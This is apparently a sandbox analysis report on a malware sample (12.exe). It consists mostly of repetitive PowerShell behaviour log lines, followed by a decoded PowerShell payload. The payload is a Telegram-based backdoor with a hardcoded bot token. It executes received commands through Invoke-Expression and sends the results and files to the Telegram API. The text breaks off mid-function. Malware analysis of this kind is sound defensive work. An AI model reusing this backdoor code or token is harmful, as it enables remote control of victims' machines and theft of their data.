Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3694Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1878Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4632Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3770Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep count: 3694 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep count: 1878 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2556Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1096Thread sleep count: 4632 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6152Thread sleep count: 3770 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3356Thread sleep count: 107 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7300Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8172Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40AAE0 FindFirstFileExW,0_2_00007FF73A40AAE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: svchost.exe, 00000007.00000002.3715759074.000001BDE4613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3716274427.000001BDE9E57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.3715780094.000001BDE462B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: powershell.exe, 00000005.00000002.3965066226.000001C861F89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3FF45C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A3FF45C
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3F7D74 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF73A3F7D74
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40BDD4 GetProcessHeap,0_2_00007FF73A40BDD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3FF45C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A3FF45C
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3F8C90 SetUnhandledExceptionFilter,0_2_00007FF73A3F8C90
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3F8AB0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73A3F8AB0
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A3F87DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF73A3F87DC

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\12.exeProcess created: Base64 decoded $Token = "7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0"$URL = "https://api.telegram.org/bot{0}" -f $Token$lastID = 123$sleepTime = 2$identifier = -join ((48..57) | Get-Random -Count 5 | % {[char]$_})function Invoke-BotCmd { param ( $command ) try { $result = Invoke-Expression($command) } catch { $result = $Error[0].Exception } $res = "[$identifier]%0D%0A" $result | ForEach-Object {$res += [string]$_ + "%0D%0A"} if($res -eq ""){ $lastID = $updateid continue } if($res.Length -gt 4095){ for ($i = 0; $i -lt $res.Length / 4095; $i++) { $begin = $i * 4095 $end = $begin + 4094 if($end -gt $res.Length){ $end = $res.Length } $data = "chat_id=$from&text=" + $res[$begin..$end] $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null } } else { $data = "chat_id=$from&text=$res" $URI = "$URL/sendMessage?$data" Invoke-WebRequest -Uri $URI > $null }}function Invoke-BotDownload { param ( $FilePath ) Add-type -AssemblyName System.Net.Http $FieldName = 'document' $httpClientHandler = New-Object System.Net.Http.HttpClientHandler $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler $FileStream = [System.IO.FileStream]::new($FilePath,
